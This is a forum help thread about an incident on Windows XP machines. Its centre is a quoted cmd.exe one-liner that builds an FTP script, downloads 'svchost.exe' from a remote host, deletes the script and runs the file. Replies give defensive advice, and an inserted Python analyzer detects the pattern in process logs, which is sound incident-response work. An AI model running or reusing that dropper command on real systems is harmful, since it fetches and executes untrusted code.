Virus Activity?

Guest

We had three users (all with XP SP2) that all of a sudden this morning had
their task manager open up along with a command prompt. In the command
prompt, a statement was input along the lines of the following....

cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &svchost.exe


Anyone seen anything like this before? We haven't approved any Windows
Updates or anything like that (even though I wouldn't think that would have
anything to do with this). That is not a typo (above in the statement where
it says mircosoft password). Any help would be appreciated. We saw three at
the exact same time and then haven't seen anymore (we have about 100 Windows
XP SP2 machines).

Thanks in advance,
ctowndu33
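The chained command above is a classic "ftp script dropper": a series of echo redirections build a small FTP script file, ftp -s: runs it non-interactively to fetch a binary, the script is deleted, and the fetched file is executed under a system-binary name. The following Python is an added example (not code from the thread or from any of the posters) that a defender could run over the CommandLine field of process-creation logs to recognise this pattern and pull out the useful indicators (host, port, credentials, fetched file, whether it was run). It assumes the forum-mangled "-s:blush:" in the post was originally "-s:o", and the sample log line below is constructed from the post under that assumption.

```python
import re

# Constructed sample: the command line reported in the thread, with the
# forum's emoji-mangled "-s:o" restored (an assumption), as it would appear
# in the CommandLine field of a process-creation log.
SAMPLE_CMDLINE = (
    "cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o"
    "&echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o"
    "&svchost.exe"
)

# Well-known Windows binary names that a dropped payload often borrows.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe"}

CMD_PREFIX_RE = re.compile(r'^\s*(?:"?[^\s"]*cmd(?:\.exe)?"?)\s+/[kc]\s+', re.I)
ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<file>\S+)$", re.I)
FTP_SCRIPT_RE = re.compile(r"^ftp\b.*?-s:(?P<file>\S+)", re.I)
DEL_RE = re.compile(r"^(?:del|erase)\b(?:\s+/\S+)*\s+(?P<file>\S+)$", re.I)


def split_chain(cmdline):
    """Strip a leading 'cmd /k' or 'cmd /c' and split on cmd.exe chaining operators."""
    body = CMD_PREFIX_RE.sub("", cmdline, count=1)
    parts = re.split(r"\s*(?:&&|\|\||&)\s*", body)
    return [p.strip() for p in parts if p.strip()]


def rebuild_redirected_files(commands):
    """Reconstruct, in order, the files written by 'echo ... > f' / 'echo ... >> f'."""
    files = {}
    for cmd in commands:
        m = ECHO_RE.match(cmd)
        if not m:
            continue
        name = m.group("file").lower()
        if m.group("op") == ">":
            files[name] = []  # a single '>' truncates the file
        files.setdefault(name, []).append(m.group("text"))
    return files


def parse_ftp_script(lines):
    """Extract host/port, credentials and fetched file names from an ftp -s: script."""
    info = {"host": None, "port": 21, "user": None, "password": None, "fetched": []}
    for line in lines:
        tokens = line.split()
        if not tokens:
            continue
        verb = tokens[0].lower()
        if verb == "open" and len(tokens) >= 2:
            info["host"] = tokens[1]
            if len(tokens) >= 3 and tokens[2].isdigit():
                info["port"] = int(tokens[2])
        elif verb == "user" and len(tokens) >= 2:
            info["user"] = tokens[1]
            info["password"] = tokens[2] if len(tokens) >= 3 else None
        elif verb in ("get", "mget", "recv") and len(tokens) >= 2:
            info["fetched"].append(tokens[1])
    return info


def _program_name(cmd):
    """Base name of the program a chained command runs ('start x.exe' counts as x.exe)."""
    tokens = cmd.split()
    if tokens and tokens[0].lower() == "start" and len(tokens) > 1:
        tokens = tokens[1:]
    return tokens[0].strip('"').rsplit("\\", 1)[-1].lower() if tokens else ""


def analyze_cmdline(cmdline):
    """Return None when no ftp-script dropper is present, otherwise a findings dict."""
    commands = split_chain(cmdline)
    files = rebuild_redirected_files(commands)
    for idx, cmd in enumerate(commands):
        m = FTP_SCRIPT_RE.match(cmd)
        if not m or m.group("file").lower() not in files:
            continue
        script = m.group("file").lower()
        info = parse_ftp_script(files[script])
        later = commands[idx + 1:]
        deleted = False
        for c in later:
            d = DEL_RE.match(c)
            if d and d.group("file").lower() == script:
                deleted = True
        later_programs = {_program_name(c) for c in later}
        executed = [f for f in info["fetched"] if f.lower() in later_programs]
        masquerading = [f for f in info["fetched"] if f.lower() in SYSTEM_NAMES]
        return {
            "script_file": script,
            "host": info["host"],
            "port": info["port"],
            "user": info["user"],
            "password": info["password"],
            "fetched": info["fetched"],
            "script_deleted": deleted,   # anti-forensic cleanup of the script
            "executed": executed,        # fetched file launched in the same chain
            "masquerading": masquerading,  # payload named like a system binary
            "severity": "high" if executed else "medium",
        }
    return None


if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
```

The analyzer deliberately reconstructs the redirected file rather than grepping for "ftp", so that a chain which merely mentions ftp, or one that builds the script under another name, is still judged on what the script does. Feeding it 4688/Sysmon process-creation events for cmd.exe on the other ~100 machines would show whether the three sightings were really the only ones.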

Lanwench [MVP - Exchange]

ctowndu33 said:
We had three users (all with XP SP2) that all of a sudden this
morning had their task manager open up along with a command prompt.
In the command prompt, a statement was input along the lines of the
following....

cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password
/Q o &svchost.exe


Anyone seen anything like this before? We haven't approved any
Windows Updates or anything like that (even though I wouldn't think
that would have anything to do with this). That is not a typo (above
in the statement where it says mircosoft password). Any help would
be appreciated. We saw three at the exact same time and then haven't
seen anymore (we have about 100 Windows XP SP2 machines).

Thanks in advance,
ctowndu33

What antivirus software do you use? What firewall protects your network? Is
the Windows firewall enabled on these machines? I would disconnect them from
the network immediately while you do some checking, although if your other
machines aren't sufficiently protected you may have other creepy crawlies on
the network.

Mike Lowery

Looks suspicious. There are viruses that infect svchost.exe. Not sure what to
make of the commands though. "open" is not a Windows application or command and
"ms.microsoft.com" is registered to Microsoft. Of course they could have that
go anywhere if your hosts file was hacked.

Guest

We for the most part are up to date on Windows Updates. We are also up to date
on our Symantec CE for the desktops (not my personal choice but everyone has
current definitions). We have a PIX in place, but our Windows Firewalls are
turned off. Since my post, I was told from one of our users that their
cursor moved. Now, the guy here before me deployed VNC through his image to
all the PCs. Since then, I have created a new image without VNC and in the
last 6 months, we have replaced about 1/2 of the computers. This was a great
excuse to go out and remove the rest of the installs. I can't imagine though
anyone that previously worked here connecting and trying to execute that
command.

Lanwench [MVP - Exchange]

ctowndu33 said:
We for the most part are up to date on Windows Updates. We are also
up to date on our Symantec CE for the desktops (not my personal choice
but everyone has current definitions).

Have you forced a full scan?
What about anti-malware/adware/spyware?

ctowndu33 said:
We have a PIX in place, but
our Windows Firewalls are turned off.

I'd change that (use group policy to manage it, as I expect you have AD).
You can set up exceptions as needed. Also, on your PIX, I'd deny all
outbound Internet access from the LAN IP range used by your workstations
except TCP 80 and 443, for starters - and remove your end users from the
local administrators groups.

ctowndu33 said:
Since my post, I was told from
one of our users that their cursor moved. Now, the guy here before
me deployed VNC through his image to all the PCs. Since then, I have
created a new image without VNC and in the last 6 months, we have
replaced about 1/2 of the computers. This was a great excuse to go
out and remove the rest of the installs. I can't imagine though
anyone that previously worked here connecting and trying to execute
that command.

Is VNC traffic even allowed inbound through your PIX? Close it, if so. What
exactly is open?

What you saw looks highly suspicious to me. Someone or something is trying
to run a telnet session for some reason. I can't find anything useful in
Google, but you might post in microsoft.public.security for more expert
help.